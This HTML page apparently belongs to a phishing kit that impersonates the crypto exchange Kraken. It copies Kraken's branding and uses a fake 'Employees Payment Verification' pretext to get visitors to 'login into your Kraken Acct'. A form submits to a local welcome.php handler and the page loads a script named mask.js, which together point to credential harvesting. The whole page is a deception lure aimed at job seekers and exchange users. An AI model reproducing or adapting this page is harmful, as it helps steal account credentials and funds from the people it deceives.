<!DOCTYPE html>
<html dir="ltr" lang="en">

		<title>
		Workforce | Kraken
		</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<meta content="IE=edge" http-equiv="X-UA-Compatible">
		<meta content="One Identity. One Wallet." name="description">
		<meta content="" name="keywords">
		<meta content="width=device-width, initial-scale=1, minimum-scale=1" name="viewport">
		<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha512-iecdLmaskl7CVkqkXNQ/ZH/XLlvWZOJyj7Yy7tcenmpD1ypASozpmT/E0iPtmFIB46ZmdtAc9eNBvH0H/ZpiBw==" crossorigin="anonymous" referrerpolicy="no-referrer" />
		<link rel="icon" type="image/png" href="img/favicon.ico">
		<link rel="stylesheet" href="css/style.css">
		<link rel="stylesheet" href="css/eye.css">
		<script type="text/javascript" src="js/mask.js"></script>

	
		<div class="container">
			<div class="form-header">
				<div class="form-header-content" role="banner">
					<div class="partner">
						<div class="c_icon m_idme"><img alt="identity" width="70" src="img/kraken-logo.jpg"></div>
						
						<div class="c_icon m_addition"><img alt="" src="img/icon.svg"></div>
						
						<div class="c_icon m_consumer-logo"><img alt="Employ me" src="img/work.png"></div>
						
					</div>
				</div>
			</div>
			

	
	<body>
		<div class="content-container">
		<main aria-labelledby="sr_page_title" class="form-container">
			<h1>Employees Payment Verification with Kraken</h1>

				<div class="form-content">
					<p><img width="72" alt="" src="img/phone.svg"></p>
					</div>
					<div class="form-content-header u_text_center">
					<h2>Authorize your Employments mode of deposits</h2>
					</div>
					<div class="separator separator-long"></div>
					<ol class="ordered-list">
					<li>Click continue below to login to your Kraken Account</li>
					<li>Login into your Kraken Acct</li>
					<li>Authorize through the link sent to your email address</li>
					</ol>
					<form method="post" action="welcome.php" name="kraken">
						<input type="hidden" name="welcome">
					<div class="separator separator-long"></div>
					<div class="form-actions">
						<button>
					<a type="submit" class="btn btn-primary">Continue</a>
						</button>
					</div>

			</div>
		</form>
		</main>					
	</body>


</html>
